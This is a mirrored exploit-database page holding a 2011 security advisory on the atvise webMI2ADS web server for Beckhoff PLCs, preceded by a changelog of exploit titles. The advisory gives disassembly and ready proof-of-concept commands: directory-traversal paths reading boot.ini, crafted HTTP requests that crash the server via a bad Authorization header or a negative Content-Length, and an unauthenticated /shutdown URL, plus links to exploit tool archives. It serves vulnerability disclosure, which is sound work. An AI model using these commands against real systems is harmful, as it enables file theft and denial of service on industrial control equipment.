bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/windows/dos/17963.txt
Offensive Security ed0e1e4d44 DB: 2018-09-25 
1979 changes to exploits/shellcodes

Couchdb 1.5.0 - 'uuids' Denial of Service
Apache CouchDB 1.5.0 - 'uuids' Denial of Service

Beyond Remote 2.2.5.3 - Denial of Service (PoC)
udisks2 2.8.0 - Denial of Service (PoC)
Termite 3.4 - Denial of Service (PoC)
SoftX FTP Client 3.3 - Denial of Service (PoC)

Silverstripe 2.3.5 - Cross-Site Request Forgery / Open redirection
SilverStripe CMS 2.3.5 - Cross-Site Request Forgery / Open Redirection

Silverstripe CMS 3.0.2 - Multiple Vulnerabilities
SilverStripe CMS 3.0.2 - Multiple Vulnerabilities

Silverstripe CMS 2.4 - File Renaming Security Bypass
SilverStripe CMS 2.4 - File Renaming Security Bypass

Silverstripe CMS 2.4.5 - Multiple Cross-Site Scripting Vulnerabilities
SilverStripe CMS 2.4.5 - Multiple Cross-Site Scripting Vulnerabilities

Silverstripe CMS 2.4.7 - 'install.php' PHP Code Injection
SilverStripe CMS 2.4.7 - 'install.php' PHP Code Injection

Silverstripe Pixlr Image Editor - 'upload.php' Arbitrary File Upload
SilverStripe CMS Pixlr Image Editor - 'upload.php' Arbitrary File Upload

Silverstripe CMS 2.4.x - 'BackURL' Open Redirection
SilverStripe CMS 2.4.x - 'BackURL' Open Redirection

Silverstripe CMS - 'MemberLoginForm.php' Information Disclosure
SilverStripe CMS - 'MemberLoginForm.php' Information Disclosure

Silverstripe CMS - Multiple HTML Injection Vulnerabilities
SilverStripe CMS - Multiple HTML Injection Vulnerabilities

Apache CouchDB 1.7.0 and 2.x before 2.1.1 - Remote Privilege Escalation
Apache CouchDB 1.7.0 / 2.x < 2.1.1 - Remote Privilege Escalation

Monstra CMS before 3.0.4 - Cross-Site Scripting
Monstra CMS < 3.0.4 - Cross-Site Scripting (2)

Monstra CMS < 3.0.4 - Cross-Site Scripting
Monstra CMS < 3.0.4 - Cross-Site Scripting (1)
Navigate CMS 2.8 - Cross-Site Scripting
Collectric CMU 1.0 - 'lang' SQL injection
Joomla! Component CW Article Attachments 1.0.6 - 'id' SQL Injection
LG SuperSign EZ CMS 2.5 - Remote Code Execution
MyBB Visual Editor 1.8.18 - Cross-Site Scripting
Joomla! Component AMGallery 1.2.3 - 'filter_category_id' SQL Injection
Joomla! Component Micro Deal Factory 2.4.0 - 'id' SQL Injection
RICOH Aficio MP 301 Printer - Cross-Site Scripting
Joomla! Component Auction Factory 4.5.5 - 'filter_order' SQL Injection
RICOH MP C6003 Printer - Cross-Site Scripting

Linux/ARM - Egghunter (PWN!) + execve(_/bin/sh__ NULL_ NULL) Shellcode (28 Bytes)
Linux/ARM - sigaction() Based Egghunter (PWN!) + execve(_/bin/sh__ NULL_ NULL) Shellcode (52 Bytes)
2018-09-25 05:01:51 +00:00

140 lines
No EOL
4.2 KiB
Text
Raw Blame History

#######################################################################
Luigi Auriemma
Application: atvise webMI2ADS - Web server for Beckhoff PLCs
http://www.atvise.com/en/atvise-downloads/products
Versions: <= 1.0
Platforms: Windows XP embedded and CE x86/ARM
Bugs: A] directory traversal
B] NULL pointer
C] termination of the software
D] resources consumption
Exploitation: remote
Date: 10 Oct 2011
Author: Luigi Auriemma
e-mail: aluigi@autistici.org
web: aluigi.org
#######################################################################
1) Introduction
2) Bugs
3) The Code
4) Fix
#######################################################################
===============
1) Introduction
===============
From vendor's website:
"webMI2ADS is a very slim and compact web server with an ADS interface
(Beckhoff native PLC interface). It can be integrated on nearly any
ethernet based Beckhoff PLC and provides full data access including
automatic import of all PLC variables and types."
#######################################################################
=======
2) Bugs
=======
----------------------
A] directory traversal
----------------------
Classical directory traversal through the backslash delimiter which
allows to get the files located on the disk where is running the
server.
---------------
B] NULL pointer
---------------
NULL pointer dereference caused by the lacking of checks on the value
returned by strchr on the Authorization Basic HTTP field:
0043094F |> 6A 06 PUSH 6 ; /maxlen = 6
00430951 |. 68 7CAB4400 PUSH webMI2AD.0044AB7C ; |s2 = "Basic "
00430956 |. 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] ; |
00430959 |. 50 PUSH EAX ; |s1
0043095A |. FF15 10044400 CALL DWORD PTR DS:[<&MSVCR90._strnicmp>] ; \_strnicmp
...skip...
004309BC |. 6A 3A PUSH 3A ; /c = 3A (':')
004309BE |. 8D8D F8FEFFFF LEA ECX,DWORD PTR SS:[EBP-108] ; |
004309C4 |. 51 PUSH ECX ; |s
004309C5 |. FF15 FC034400 CALL DWORD PTR DS:[<&MSVCR90.strchr>] ; \strchr
004309CB |. 83C4 08 ADD ESP,8
004309CE |. 8945 F4 MOV DWORD PTR SS:[EBP-C],EAX
004309D1 |. 837D FC 00 CMP DWORD PTR SS:[EBP-4],0
004309D5 |. 74 4B JE SHORT webMI2AD.00430A22
004309D7 |. 8B55 F4 MOV EDX,DWORD PTR SS:[EBP-C]
004309DA |. 2B55 FC SUB EDX,DWORD PTR SS:[EBP-4]
004309DD |. 83FA 40 CMP EDX,40
004309E0 |. 7D 40 JGE SHORT webMI2AD.00430A22
004309E2 |. 8B45 F4 MOV EAX,DWORD PTR SS:[EBP-C]
004309E5 |. C600 00 MOV BYTE PTR DS:[EAX],0
------------------------------
C] termination of the software
------------------------------
For terminating the software remotely it's enough to go on the
/shutdown webpage.
------------------------
D] resources consumption
------------------------
Endless loop with memory consumption and CPU at 100% caused by a
particular negative Content-Length.
#######################################################################
===========
3) The Code
===========
http://aluigi.org/mytoolz/mydown.zip
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17963-1.zip
http://aluigi.org/testz/udpsz.zip
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17963-2.zip
A]
mydown http://SERVER/..\..\..\..\..\..\..\boot.ini
mydown http://SERVER/..%5c..%5c..%5c..%5c..%5c..%5cboot.ini
B]
udpsz -c "GET / HTTP/1.0\r\nAuthorization: Basic blah\r\n\r\n" -T -D SERVER 80 -1
C]
http://SERVER/shutdown
D]
udpsz -c "POST / HTTP/1.0\r\nContent-Length: -30\r\n\r\n" -T -D SERVER 80 -1
#######################################################################
======
4) Fix
======
No fix.
#######################################################################
Reference in a new issue View git blame Copy permalink